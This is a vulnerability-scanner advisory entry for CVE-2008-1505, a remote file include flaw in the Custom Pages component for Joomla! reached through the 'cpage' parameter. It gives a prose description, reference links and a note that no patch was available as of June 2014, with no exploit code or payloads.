VID |
210110 |
Severity |
40 |
Port |
80, ... |
Protocol |
TCP |
Class |
CGI |
Detailed Description |
The Joomla! program is vulnerable to a remote file include vulnerability via the 'cpage' parameter. Joomla! is an open-source contents management system written in PHP. Custom Pages is a third-party module for Joomla!. Custom Pages component version 1.1 and earlier versions are vulnerable to a remote file include vulnerability, caused by input validation errors in the 'custompages.php' script when processing the 'cpage' parameter. By sending a specially-crafted URL request to the 'index.php' script using the 'cpage' parameter, regardless of PHP's 'register_globals' setting, a remote attacker could exploit this vulnerability to execute arbitrary PHP code with the privileges of the web server.
* References: http://www.milw0rm.com/exploits/5294 http://secunia.com/advisories/29520
* Platforms Affected: Simple Rapid Addon Dev, Custompages component for Joomla! version 1.1 and earlier versions Any operating system Any version |
Recommendation |
No upgrade or patch available as of June 2014.
Upgrade to a fixed version of Custompages component, when new fixed version becomes available from the Joomla! Extensions Directory Web site at http://extensions.joomla.org/component/option,com_mtree/task,viewlink/link_id,1125/Itemid,35/ |
Related URL |
CVE-2008-1505 (CVE) |
Related URL |
28409 (SecurityFocus) |
Related URL |
41396 (ISS) |
|